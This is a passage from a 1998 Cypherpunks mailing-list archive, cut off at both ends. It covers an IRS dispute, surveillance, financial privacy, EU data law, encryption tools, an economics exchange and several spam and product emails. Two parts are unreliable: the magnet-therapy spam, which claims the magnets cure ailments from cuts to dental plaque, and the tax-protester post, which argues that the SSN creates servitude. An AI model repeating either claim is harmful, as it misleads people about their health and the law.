    25 April 1998, which should be considered part of this 1040X form.

Below is IRS' response to our 1040X. At this point, we have come to the
end of the appeal process with IRS: there are no more appeals available
via IRS. Any further action must be taken in court, whether it be Tax
Court, US District Court, or, according to the letter, US Federal Claims
Court.

Unless someone convinces us that one of the other courts would be
better, we intend to take the matter to US District Court, which, I've
been told, is in Louisiana.

As all these legal matters are entirely new to us, we encourage anyone
(who knows what they are talking about) who wishes to inform us to feel
free to contact us. We'll consider whatever advise anyone has to offer.
How do we file? Where do we file? How do we set up the law suit so we
don't ruin it for everyone in the country, as some uninformed patriots
have done on other income tax related matters? Should we file a class
action suit, since there are many others who are in the same predicament
as we are in? Is there some other form of lawsuit that we should file?

By the way, the IRS letter really does say "INDENTIFICATION NUMBER."
The root of "indentification" would be indent- plus the ending
-ification. The word in English closest to indent- is indenture, as in
indentured servant, which is someone who, by some instrument (in this
case, a SSN), makes themselves the servant of someone else
for a period of time, as stated in the instrument (in the case of the
SSN, forever).

Then again, "indemnification," as in "indemnify," (to secure against
loss) is also close to "INDENTIFICATION." Maybe they are offering us an
indemification number, because if we have it, they will leave us alone, and
will no longer harm us financially.


IRS letter follows:

-------------------------------
Department of the Treasury
Internal Revenue Service
In reply refer to: ............
AUSTIN, TX 73301 Aug. 25, 1998 LTR 105C

[name removed]

CERTIFIED MAIL

Taxpayer Identification Number: 666......
Kind of Tax: INCOME
Amount of Claim(s): $ 1,148.00

Date Claim(s) Received: Aug. 03, 1998
Tax Period(s): Dec. 31, 1996


Dear Taxpayer:

This letter is your legal notice that we have disallowed your
claim(s). We can't allow your claim(s) for refund or credit for the
period(s) shown above for the reason(s) listed below.

PER SECTION 151(e) STATES THAT EACH DEPENDENT MUST HAVE A
INDENTIFICATION NUMBER IF THEY ARE BEING CLAIMED AS A DEPENDENT ON THE
TAX RETURN. SECTION 152(e) HAS BEEN CORRECTLY APPLIED

If you want to sue to recover tax, penalties, or other amounts, you
may file a lawsuit with the United States District Court having
jurisdiction or with the United States Court of Federal Claims.
These courts are independent bodies and have no connection with the
Internal Revenue Service.

The law permits you to do this within 2 years from the mailing date
of this letter. If you decide to appeal our decision first, the
2-year period still begins from the mailing date of this letter.
However, if you signed an agreement that waived your right to the
notice of disallowance (Form 2297), the period for filing a lawsuit
began on the date you filed the waiver.

If you have any questions, please call us. You may call
............ between the hours of 8:00 A.M. and
5:00 P.M. at ............ for assistance. If the number is
outside your local calling area, there will be a long-distance
charge to you. If you prefer, you may call the IRS telephone
number listed in your local directory or (1-800-829-1040). An
employee there may be able to help you, but the office at the
address shown on this letter is most familiar with your case.


If you prefer, you may write to us at the address shown at the top
of the first page of this letter.

Whenever you write, please include this letter and, in the spaces
below, give us your telephone number with the hours we can reach you.
Also, you may want to keep a copy of this letter for your records.

Telephone Number (   )______________________ Hours_____________


Sincerely yours,

...............
District Director

Enclosure(s):
Publication 1


=======================================================================
Don't believe anything you read on the Net unless:
1) you can confirm it with another source, and/or
2) it is consistent with what you already know to be true.
=======================================================================
Reply to: <fingerprint@networkusa.org>
=======================================================================
 To subscribe to the free Scan This News newsletter, send a message to
     <majordomo@efga.org> and type "subscribe scan" in the BODY.
    Or, to be removed type "unsubscribe scan" in the message BODY.
   For additional instructions see www.efga.org/about/maillist.html
-----------------------------------------------------------------------
             "Scan This News" is Sponsored by S.C.A.N.
           Host of the "FIGHT THE FINGERPRINT!" web page:
                www.networkusa.org/fingerprint.shtml
=======================================================================




****************************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address

or (un)subscribe ignition-point-digest email@address
****************************************************
www.telepath.com/believer
****************************************************

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Maria Cantwell <mariac@dmail1.real-net.net>
Date: Mon, 19 Oct 1998 14:36:40 +0800
To: cypherpunks@toad.com
Subject: RealPlayer G2 Full Beta Release *Now Available*
Message-ID: <199810190558.WAA05351@dmail5.real-net.net>
MIME-Version: 1.0
Content-Type: text/plain



Dear RealPlayer Customer,

At RealNetworks, we take pride in continually 
improving our RealPlayer products for you.  We 
think you'll find that our latest RealPlayer 
release, RealPlayer G2 full beta, is a significant 
improvement over earlier versions.

With RealPlayer G2 full beta, you'll notice dramatic 
quality enhancements in RealVideo with the 
introduction of RealVideo G2.  RealVideo G2, which 
uses technology from Intel, delivers smoother video 
with higher frame rates.

There's more. Read on, or download now:

==> http://www.real.com/products/player/fullbeta20.html

Aside from being even more reliable than RealPlayer
G2 Beta 1, the major improvements in RealPlayer G2 
full beta are:

*  The new RealVideo G2 offers smoother and more 
   life-like video with technology from Intel
*  SureStream delivers a reliable, continuous 
   streaming media experience without rebuffering 
   or breakups.  SureStream now supports live 
   broadcasts.
*  More programming, more choices with RealChannels 
   and presets - just one click away
*  For high-bandwidth users, RealAudio is now 
   CD-quality.

With all these exciting new features you have to 
experience the excitement yourself.  Download now, 
watch some great new content, and ENJOY!

==> http://www.real.com/products/player/fullbeta21.html

Thank you for continuing to use RealNetworks 
products,

Maria Cantwell
Senior Vice President
RealNetworks, Inc.
Seattle, WA  USA

---------------------------------------------

 ABOUT THIS E-MAIL

 Participation in RealNetworks product updates
 and special offers is voluntary.  During the 
 installation of the RealPlayer software you
 indicated a preference to receive these emails.

 For information about subscribing to or 
 unsubscribing from future announcements, visit 
 http://www.real.com/mailinglist/index.html

 Need help with your RealPlayer product?
 E-mail RealNetworks Technical Support via:
 http://service.real.com/contact/email.htm





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jacket9@primenet.com (jacket9@primenet.com)
Date: Mon, 19 Oct 1998 16:38:33 +0800
To: ja@primenet.com
Subject: No Subject
Message-ID: <199810190810.BAA05650@smtp01.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain



Are you a skeptic when it comes to health and well being
products that claim they can do everything they say they can? Well I am and
I did
not believe this product worked until I tried it out on myself and found out
that it really does work.  Do you suffer from discomfort of any kind? 
Are you looking for something that can relieve that discomfort?  Well
this product may be the answer!  My name is Tony and I am promoting a product
that is beginning its introduction in the United States from a company
in Japan which involves the use of special magnets for wellness therapy. 
You may have seen other companies claiming that magnets help reduce
discomfort from anything from headaches to cramps to sore muscles but their
magnets are not nearly as effective as they should be because of the way they
were designed. This is where I come in, I am promoting a company whose magnets
are specially designed to stimulate all the nerve endings in your
body by the special diamond design that is patented by only one company in
the world.  Other magnets have the north and south poles (where the magnetic
power is held) in a standard straight up and down design but the magnets
I promote have the patented diamond design where the poles do not run up
and down but are angled in all directions in order to stimulate each nerve
ending.  Since our bodies are not designed where our nerve endings are up
and down we need something that will be able to cover us in all directions. 
These special magnets have been tested on people with many different
kinds of discomfort ranging from anywhere to a simple minor headache to
muscle cramps, heartburn, aching backs, tired feet, bruises, cuts,
indigestion, physical discomfort from stress, even dental plaque!  All the
test subjects showed moderate to complete recovery from these and many other
discomforts they suffered.  These magnets not only ease your discomfort but
they also provide you with a little extra strength and energy when you
need it the most.  Even if you just bumped your head or have suffered from
chronic discomfort from something for years this product will help ease
it as long as you keep it on your body.  In some people they got results in
a matter of minutes from slight discomfort but for patients who have been
suffering the results may take a few days to notice a difference.  This does
work on anyone in any age group from small children to senior citizens,
however, pregnant women and anyone with heart devices should not use this
product.  People who have had surgery done who have had any kind of metal
or plastic can use this product also!  To find out more please reply to me,
Tony, and ask me about these magnets.  I can tell you that any other magnet
you buy at a cheap discount price ie $18 for a whole set  that they do not
work because of the north and south magnetic poles are being up and down.
This company has a patented design where the north and south poles run in
every direction stimulating each nerve ending in our body.  I can tell you
that this product really works and for just $18 I can send you a magnet that
will help relieve just about any minor physical discomfort you suffer from.
I also have a long line of other products that use these patented magnets
such as: shoe inserts that will help soothe tired and sore feet but will
also soothe your body all the way up your legs, wrist bands, ankle bands,
knee bands that have the magnets throughout the entire band, a belt, even a
gold or pearl necklace with the magnets built in!  PLease reply if you are
interested or would like further information.

Thank you





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Soren <sorens@workmail.com>
Date: Mon, 19 Oct 1998 07:35:35 +0800
To: cypherpunks@cyberpass.net
Subject: Year 2000 opportunity?
Message-ID: <362B1FD3.3F4DA05B@workmail.com>
MIME-Version: 1.0
Content-Type: text/html




 
http://www.LibertySoft.com/liberty/features/58bradford1.html
 



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "christian masson" <interception1001@hotmail.com>
Date: Mon, 19 Oct 1998 23:42:02 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <19981019145116.12414.qmail@hotmail.com>
MIME-Version: 1.0
Content-Type: text/plain



SUBJECT: EU-USA ECHELON
TO:      OMEGA FOUNDATION + European Parliament (civil liberties,...)         
DT:      9/19/98        



Ref.: 
Mr Steve Right 
OMEGA FOUNDATION
Author of:  
http://www.europarl.eu.int/dg4/stoa/en/publi/166499/execsum.htm 

I/
Section 2.3, you said: " Modern snoopers can buy specially adapted lap 
top computers, and simply tune in to all the mobile phones active in the 
area by cursoring down to their number. The machine will even search for 
numbers 'of interest' to see if they are active." 
Actually, only a public logger:
http://www.rsd.de/PRODUKT/22da.htm
is able to catch IMSIs and intercept called-calling parties.
Do you know the model that you mentionned?  


II/ 
No a word about 100 Millions GSM mapped&traced. Why?
GSM Trace Scandal exposed:
http://jya.com/gsm-scandal.htm


III/
Latest GSM EUser Traking Table:
http://www.ii-mel.com/interception/mobile_tracegb.htm

IV/ European Electronic Surveillance:
http://www.ii-mel.com/interception

Congratulations, except GSM-trace, for your objectivity.

Regards,  
  

Christian Masson 
La Ferme 
Ch.Pierrefleur 74 
Pobox505 
CH- 1000 Lausanne 17
_______________________

interception@ii-mel.com
_______________________

GSM TRACE PROTEST PETITION ON CYBERCRATE (belgium parlement)
http://www.axismundi.org/Cf/laurus/cybercrate/belgium/fr/actions.htm

______________________________________________________



______________________________________________________
Get Your Private, Free Email at http://www.hotmail.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Motyka <mmotyka@lsil.com>
Date: Tue, 20 Oct 1998 03:46:37 +0800
To: cypherpunks@cyberpass.net
Subject: RE: IP: Fwd: Evaluation of Vehicle Stopping Prototype ("Kill Switch")
Message-ID: <362B8D7F.888@lsil.com>
MIME-Version: 1.0
Content-Type: text/plain



> [Note from Matthew Gaylor: Several years ago on this list I mentioned
> that EMP devices will soon be used to stop car chases.  Several of my
> subscribers wrote in and said I must be crazy, that I lived in a 
> science fiction fantasy.  Oh well, the future is now.]

These ideas have been around for more than a few years. In the past year
or so I've seen two systems on Discovery Channel. One was a flat strip
that was unrolled across the road and generated some ESD when the car
crossed it. The other one was a cockamamie toy rocket car that would be
deployed by the pursuing car and run under the pursued. They say it
shows promise.

These things are fine. It would probably require small effort to devise
effective CM. The project solicitation is pretty nasty however: they
very casually talk about high energy RF. I would say pointing that crap
at anyone would come under "reckless endangerment". 

I miss the days of mechanical ignition points and carbureters!

BTW - Did you see the bullshit that happened up in Vallejo? Cops sent a
dog into a culvert after a suspect. The suspect shot and killed the dog.
The police had a full-fledged funeral, casket and all for the fucking
dog. Flowers all over he place, mourners. Now they're buying goddamned
kevlar vests for their dogs. Fuckheads. Who's the citizen? The human or
the dog?

As for the suspect he's charged with something for killing the dog.
Simple destruction of property, which would be a charge befitting the
act, is probably not enough to avenge beloved Bowser's death. Because
it's a cop-dog-on-duty the penalty is probably more than restitution and
some community service. Jail time for defending yourself against an
attack dog?

I think maybe our society is suffering from a form of mass insanity
induced by the fucking television programming. LE seem to think they're
John Wayne or Steven Segal. They actually believe the brain-dead, binary
morality of pop fiction. Us vs Them, Good-guys vs. Bad-guys, Human vs.
Non-human. The lack of perspective is mind-blowing.

Mike




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@invweb.net>
Date: Tue, 20 Oct 1998 01:51:36 +0800
To: ichudov@Algebra.COM (Igor Chudov @ home)
Subject: Re: What's up with algebra.com?
In-Reply-To: <199810190043.TAA03178@manifold.algebra.com>
Message-ID: <199810191722.MAA008.39@geiger.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

In <199810190043.TAA03178@manifold.algebra.com>, on 10/18/98 
   at 07:43 PM, ichudov@Algebra.COM (Igor Chudov @ home) said:

>As far as algebra.com is concerned, the list went down because my
>upstream site just installed anti-relaying rules, and everything going to
>algebra.com was rejected. Also, sendmail was not setuid and could not
>create mqueue files.

>I wish I could boast receiving attention from the IRS/BATF or  whatever,
>but so far i has not happened.

What is with these fascist ISP who think they have a *right* to regulate
the data stream of others? What's next, are they going to start blocking
domains because they don't like what is on a web page, or because they
don't like an e-mail message someone posts??

Don't have to worry about government censorship there are plenty of
civilians that are willing to do the work for them. :(

- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://www.openpgp.net
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 5.0 at: http://www.openpgp.net/pgp.html
- ---------------------------------------------------------------
 
Tag-O-Matic: "640K ought to be enough for anybody." - Bill Gates, 1981

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a-sha1
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBNit1SY9Co1n+aLhhAQE+xwP+JcgMUEkGgdiXqDPEOKWloMjMBVtSjVVw
pXukU+k6IAhpuFFA5hmuK9ISrk1NMaY0T907LRnLJnpD1deqXIFTLnEdncI6c7+T
L2zWcpycJZDyhUMOGQJ1cqwIXHBjLKUQjOMEAI+HRQnZ75S5L/siXVHZ6kmN84iF
8Pc62LP3NP8=
=pB38
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Tue, 20 Oct 1998 01:58:29 +0800
To: cypherpunks@cyberpass.net
Subject: dbts: The Economic Cause of Privacy
Message-ID: <v04020a13b2511a1b98f8@[139.167.130.247]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Mime-Version: 1.0
X-Sender: rah@pop.sneaker.net
Date: Mon, 19 Oct 1998 11:20:38 -0400
To: dbs@philodox.com
From: Robert Hettinga <rah@shipwright.com>
Subject: dbts: The Economic Cause of Privacy
Sender: <dbs@philodox.com>
Precedence: Bulk
List-Subscribe: <mailto:requests@philodox.com?subject=subscribe%20dbs>
X-Web-Archive: http://www.philodox.com/dbs-archive/

-----BEGIN PGP SIGNED MESSAGE-----

At 7:45 AM -0400 on 10/19/98, Anonymous forwarded this to the dbs list:

> see http://www.zolatimes.com/V2.23/anonymittext.html

It's just another financial privacy rant, though a relatively decent one. It's
from J. Orlin Grabbe, who was at FC98, BTW. When I met him at S&PBank's party
at Cap Julaca, he seemed like a nice, though fairly intense, guy. Financial
privacy *makes* you intense, I suppose.

Nonetheless, like all financial privacy rants, Orlin's reverses cause and
effect, but it's not really his fault.


Remember, the reason we have no financial privacy these days is because we
have book-entry settlement, which relies on biometric identity, known physical
location, and the force of a nation state as the ultimate "error-handler" to
prevent repudiation in the transaction protocol.

The reason we have book-entry settlement itself is because it is several
orders of magnitude cheaper than physical delivery of paper bearer
certificates.


The *only* way to have financial privacy in a book-entry world is to engage in
the financial equivalent of steganography, which, no matter how financially
and legally facile -- even elegant -- it is, at the margin it costs more to
hide money than not to. It will always cost more in a book-entry economy, and
for structural reasons.

Worse, most of these accounting and legal gyrations are just plain old
security by obscurity, something most crypto-clueful people learn, fairly
early on, to treat with the utmost scorn and derision.


If my hypothesis is right, and digital bearer settlement is significantly
cheaper than book-entry settlement, say three orders of magnitude cheaper,
then financial privacy will be the default state of affairs sooner or later.
It will actually cost *more* to keep transaction records and the physical
location of economic actors than not to. No amount of physical force, much
less law, accounting, or "policy", will change that physical, economic, fact.
A fact which every economic actor, from the smallest proprietor to the largest
nation state, will end up ignoring at their peril.

The reason digital bearer settlement will be faster, and thus cheaper, is
because the cryptographic protocol breaks before the transaction can. Unlike a
book entry protocol, where you can execute a trade and then renege on it
later, causing bounced checks, charge-backs, broken trades, DKs and the like,
software using a digital bearer protocol can execute *only* if both parties
cannot renege on the transaction in the first place.

One of the best guarantors of that inability to renege is, paradoxically,
cryptographically certain anonymity. Immediate and final clearing and
settlement means that you tend not to care who you've done business with in
the first place, but cryptographic anonymity not only makes the transaction
stronger and safer, it is the very enabling technology of the process, the
thing which makes digital bearer transaction settlement the fastest, and,
systemically, the cheapest transaction technology to use.

Again, it's just like air travel. You can go very fast on land, much faster
than it takes to fly even without wings, as sound-barrier-breaking speed
records show us. But, the physical, economic fact is, people can travel the
fastest and cheapest over the longest distances when they fly, so that's what
they do. They don't fly just because the view's nicer, or, as I've joked
before, "to slip the surly bounds of earth".

And, most important, this economic reality, that economics ultimately
determines a technology's use, is true no matter what the intent is of any
airplane -- or bearer protocol -- designer.


The cost of anything is the foregone alternative. One of costs of book-entry
settlement is privacy, surely, but in a world of strong financial cryptography
and ubiquitous geodesic networks, the primary cost of book-entry settlement is
wasted time and computing resources. Costs which will eventually force the
adoption of digital bearer transaction settlement, giving us ubiquitous
financial privacy -- and freedom -- as a result.

Effects of our technology, in other words. Not its cause.

Cheers,
Bob Hettinga



-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.5.5

iQEVAwUBNitXcMUCGwxmWcHhAQHApAf/f1mtuoqig0dsyOa6d5n39N4O8EmCykST
eF2+s+cDP6Nur4KZ8PdFXczfQIBot3Hn7NYWR1cUwvuxE2yJJSBDLKd3MK7ubQey
qyLtRA8Z033q2OqUmMIc3v62QrtusBO1Xbbdgx800Z5IyuwlprfN6VPcaNpTzIl6
zmdS8KLjj1z2I/C0gi715cyQ/X9y11FHrgvXmF/7HTcbH+mtxQHxxl44DrbqVPBQ
XTPU09+1UpVirhIq7KQgSAXD+GFNsr5LGSRVsdtXGQJy8mbSkmsMMOrVOG32yqa9
Ual0RqEC7ELQQLWx+86g7f5loNJEQzgTggYOGZs0AIIZJPUG1WnvAw==
=PqXA
-----END PGP SIGNATURE-----
-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Watts <davidwatts_98@yahoo.com>
Date: Tue, 20 Oct 1998 04:29:25 +0800
To: cypherpunks@cyberpass.net
Subject: EU Privacy Directive
Message-ID: <19981019195132.27759.rocketmail@send1e.yahoomail.com>
MIME-Version: 1.0
Content-Type: text/plain



Deadline for EU Data Privacy Law
Prompts Worry Among Businesses
By JENNIFER L. SCHENKER and JULIE WOLF 
Special to THE WALL STREET JOURNAL


The mounds of data that zap electronically across borders may face
some travel restrictions as a European Union law takes effect this
week. Three years of talks between the EU and the U.S. have failed to
find a compromise on how to protect the privacy of data, and that has
businesses and consumer groups worried.

The issue arose in 1995, when Citibank Deutschland AG came under
attack for a co-branded credit-card program with Deutsche Bahn AG. The
program, Germany's data police decided, invaded the privacy of
citizens because the sign-up questionnaire was too nosy and the data
was processed in the U.S. The bank made headlines by offering to allow
Germany's data police to come to the U.S. to inspect its
data-processing arrangements.

Citibank solved its problems in Germany, but the European Commission
reasoned national data regulators couldn't possibly travel to the U.S.
to verify the compliance of all of the companies in Europe that send
personal data abroad for processing. Instead, the commission passed a
law that gave national data regulators wide powers to control what
type of data can be processed abroad and let them halt exports of
personal data to countries that don't have adequate protection, such
as the U.S. EU member states were given three years to institute
necessary changes.

Intensified Negotiations

Businesses panicked at the prospect of having data flows cut off,
databases erased and huge fines levied. Negotiations intensified
between Europe and the U.S., which planned to ensure data protection
mainly through industry self-regulation.

Three years later, just days before the deadline, a solution has yet
to be found, and Citibank and other multinationals doing business in
Europe are back in the headlines again, the targets of privacy
advocates who want to inspect transborder data flows. At issue is how
U.S. companies operating in Europe can send data back to the U.S.
without running afoul of strict new EU legislation on data protection.
The issue won't be settled before the legislation goes into effect
Oct. 25 although U.S. and EU officials say they are hopeful enough
progress has been made to ensure that companies won't see their data
flows interrupted on Oct. 26.

"The message to business should be don't panic," advised Francis
Aldhouse, deputy data-protection registrar at the U.K.'s office of
data protection. "Nothing great and dramatic" is going to happen this
week when the directive goes into force, he said.

Threat of Legal Action

But uncertainty abounds, and big companies in Europe are worried they
could face legal action from a variety of quarters, including Privacy
International, a Washington, D.C.-based watchdog group that plans to
increase its activities in Europe.

"This is not a deal that can be cut between the White House and
Brussels," said Simon Davies, Privacy International's director. "The
data-protection directive establishes new constitutional rights in
Europe and gives us a mandate to move forward."

Between now and Jan. 15, Privacy International will meet with 25
multinational corporations and government agencies it has identified.
The group wants to examine data flows through available public records
to determine whether these companies are in compliance with the new
laws.

At the moment all personal data gathered from European clients that is
processed outside the EU is suspect. Hong Kong, Quebec and New Zealand
are the exceptions because they have received the commission's stamp
of approval for providing adequate protection. Only three EU countries
are expected to meet the commission's Oct. 25 deadline for
implementing the data-protection directive -- Italy, Greece and Finland.

"Business can not live with such uncertainty," said Mark Loliver,
legal adviser to the European Federation of Direct Marketing.

Possible Solutions

Solutions on the table include:

1. Setting up safe harbors, a compromise that would allow U.S.
companies operating in Europe to ship data back to the U.S. even
though the U.S. itself won't get the European Commission's stamp of
approval for adequate protection. The U.S. Commerce Department would
issue principles on data privacy, and companies agreeing to abide by
these would be allowed to transfer data from Europe to the U.S.
 
2. Drawing up model contracts between companies operating in Europe
and those that process data overseas. The foreign companies would have
to commit to meeting Europe's data privacy standards. 

3. Implementing new software solutions that are designed to allow
companies that handle personal information about consumers to meet
privacy requirements. 

Both the U.S. and EU have shifted considerably from their original
positions. The commission is no longer insisting that the U.S. adopt
national data-protection legislation. And the U.S. now concedes that
consumers should be able to complain to an independent group about a
company's behavior.

The commission will have to get the support of member states for any
compromise at two meetings this month, the first of which will be held
Monday.

Model Contract

Meanwhile the International Chamber of Commerce, British Federation of
Business and a number of other organizations are jointly working on a
model contract that could be drawn up between a company operating in
Europe and the company which processes data for it abroad, said Colin
Fricker, director of legal affairs at the U.K.'s Direct Marketing
Association and a member of the model contract working party of the
Confederation of British Industry.

Separately, some companies hope to tackle the problem with
technological solutions. NCR Inc., a Dayton, Ohio, data-warehousing
specialist said that beginning in January it will build in new
software features that will allow the auditing of computer databases
to ensure compliance with government data privacy regulations. Its
clients include financial institutions and retailers.

For its part, Privacy International says neither model contracts or
technological solutions offer adequate protection. "Companies in the
U.S. continue to maintain that industry code of practice and
privacy-enhancing technology afford protection and it does not -- it
is a very tiny step in the right direction," said Privacy
International's Mr. Davies. "The message we want to give the U.S. is
why are you following an outdated libertarian philosophy when you know
it is going to cost you dearly."





_________________________________________________________
DO YOU YAHOO!?
Get your free @yahoo.com address at http://mail.yahoo.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Fisher Mark <fisherm@tce.com>
Date: Tue, 20 Oct 1998 03:22:02 +0800
To: "'cypherpunks@cyberpass.net>
Subject: RE: 2 questions: Prime Numbers and DES
Message-ID: <2C396693FBDED111AEF60000F84104A721C02B@indyexch_fddi.indy.tce.com>
MIME-Version: 1.0
Content-Type: text/plain



>2.  Is there an implentation of DES in perl?  I didn't see a link to one
>on the export-a-sig page.  If not perl, is there one for DOS?  I'm
>looking for a bare bones one, not something with tons of features
>and a GUI.  A perl or dos version of the unix "des" program would be
>preferable.

CPAN (the Comprehensive Perl Archive Network),
<URL:http://www.perl.com/CPAN/>, is your friend -- use it.  (Look under
"Authentication, Security and Encryption" -- there are 3 versions of DES
listed, along with an interface to SSLeay, which includes DES as one of its
algorithms).
==========================================================
Mark Leighton Fisher          Thomson Consumer Electronics
fisherm@indy.tce.com          Indianapolis, IN
"Their walls are built of cannon balls, their motto is
'Don't Tread on Me'"






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adobe Systems <wcd@Adobe.COM>
Date: Tue, 20 Oct 1998 06:24:45 +0800
To: cypherpunks@toad.com
Subject: Your New Adobe Customer Number
Message-ID: <199810192141.OAA02380@mail-sea.sea.Adobe.COM>
MIME-Version: 1.0
Content-Type: text/plain




Thank you for registering with Adobe Systems, Inc. 

Your new Online Customer ID is: 2202094119525317

The PIN you entered and confirmed has been encrypted and stored with your
registration information.

Please remember your Customer ID and PIN for the next time you login as an
Adobe Customer on www.adobe.com.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alexander Kjeldaas <astor@guardian.no>
Date: Mon, 19 Oct 1998 21:55:12 +0800
To: HyperReal-Anon <cypherpunks@toad.com
Subject: Re: Disk (block device) encryption for Linux and *BSD?
In-Reply-To: <bd2017dd20d31dc4297751e94f5aa776@anonymous>
Message-ID: <19981019150728.A19456@lucifer.guardian.no>
MIME-Version: 1.0
Content-Type: text/plain



On Fri, Oct 16, 1998 at 01:30:06PM -0000, HyperReal-Anon wrote:
> 
> Apologies for the interruption,
> 
> I'm looking for disk / partition encryption for Unix-alikes, especially
> Linux, OpenBSD and/or NetBSD.
> 
> My websearch has been less than satisfactory - I found outdated Linux
> kernel patches for encryption loopback, and I distinctly remember reading
> about a serious bug in the use (or lack thereof) of key material in this
> code.
> 
> Do patches for a current Linux kernel exist, and have all the known
> bugs been fixed?
> 

I have collected the available loop-crypto patches in the
international kernel patch.  It contains blowfish,twofish,serpent, and
cast-128 modules (and an idea module which I haven't ported yet).  The
loopback modules have been updated to work with the latest loopback
patches.  I plan on adding other AES candidates - I have free
implementations of rc6, rijndael, mars, and dfc.  The patch is
available from:

ftp://ftp.kerneli.org/pub/linux/kerneli/v2.1/patch-int-2.1.125.2.gz

I have a collection of utilities you'll need and other 2.0-crypto
stuff mirrored at:

ftp://ftp.kerneli.org/pub/linux/kerneli/net-source/

astor

-- 
 Alexander Kjeldaas, Guardian Networks AS, Trondheim, Norway
 http://www.guardian.no/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tzeruch@ceddec.com
Date: Tue, 20 Oct 1998 12:31:15 +0800
To: Jim Choate <ravage@EINSTEIN.ssz.com>
Subject: Re: Another potential flaw in current economic theory...
In-Reply-To: <199810061317.IAA07423@einstein.ssz.com>
Message-ID: <98Oct19.235259edt.42154@brickwall.ceddec.com>
MIME-Version: 1.0
Content-Type: text/plain



On Tue, 6 Oct 1998, Jim Choate wrote:

> It occurs to me that there is another potential flaw in current economic
> theory and business practice.
> 
> Currently (ala Friedmann) the parties that reap the benefit of a succesful
> business are the shareholders, this is currently seen to exclude the
> employees in many cases/companies.
> 
> This approach undervalues the business worth of the employees commitment to
> the business.

Not labor any more than capital.  I think what you refer to is often
called "stakeholders" which includes suppliers and customers in addition
to employees. 

However you do not need to play games to justify proper treatment of
employees.  If you consider capital such as a machine, it is usually
better to keep it well maintained and in good repair instead of letting it
wear out and rust - the quality of your goods will suffer, profits will go
down, and shareholders will dump management.

The same applies for labor.  If you treat employees badly, and they are in
a free labor market, you will be left with those who will tolerate your
abuse, or ignore it.  These are likely to be as less productive as the
rusty machine.

And employees usually create mental capital.  Except for the most menial
tasks, they will know who to call and how to get some otherwise trivial
things done much more efficiently than someone new.  And they will be able
to identify ways to make their niche more efficient for little extra cost
(v.s. having a bunch of consultants go through to obtain the same
information).  Lose a long term employee and you have lost a lot of
knowledge which you will pay dearly to replace.  High turnover is bad for
almost every business.  Maltreatment is universally bad.

Our current stock market bubble - which is in the process of popping -
distorted this.  My concept of Usury (yes, another mideval or earlier
idea) is loaning in the abstract.  You just want 5% or 10%, and try to
find a piece of paper (or electronic book entry) that will return it
regardless of what is behind the paper.  This can include ponzi schemes if
they aren't recognized as such.

If people were really investing in the non-usurous sense, they would be
concerned with the company as an organic whole, with the suppliers, and
customers, and employees, and the physical plant and everything else,
since the overall health would have a direct impact on the return on their
investment - and this would typically give a dividend yield a few percent
above something like a 10yr treasury.

If I want milk, I will be very concerned with keeping the cow happy and
healthy, and doing so rationally - pampering the cow too much won't give
any more milk and maybe make the cow less healthy, but starving it or
beating it would be worse.

But now people own mutual funds, and probably don't know what positions
they are in today.  They simply assume it will go up 10% "over the long
term" regardless if they invest in CocaCola, RJR Nabisco, Yahoo, or GE, so
why bother checking what is behind the stock certificate - if they miss
their earnings, the fund manager will simply swap it for something else
not based on the company or employees, but just on a few abstract numbers 
reported each quarter.

I like Yahoo and Amazon, but can't concieve of any logic to their market
capitalization.  They would have to grow at double digit rates to long
past my retirement to return to a rational valuation (assuming the stock
price didn't go up further).  I haven't heard a reason connected with
something tangible (dividends, book-value, cash flow) for someone to own
such a stock.  Only that "it the internet".  And I think this decoupling
is at the center of what you are getting at.  Paper v.s. people, and when
it comes time to decide, the paper wins.

There is a lot of ignorance, and it is rational in the short term - these
stocks are going up, so it would otherwise make sense to follow the trend.
But if the trend is all that is being watched, who is going to care if
they are using slave-labor? - to mention just one issue.

But that is investing in a bubble.  The same thing happened in 1720 with
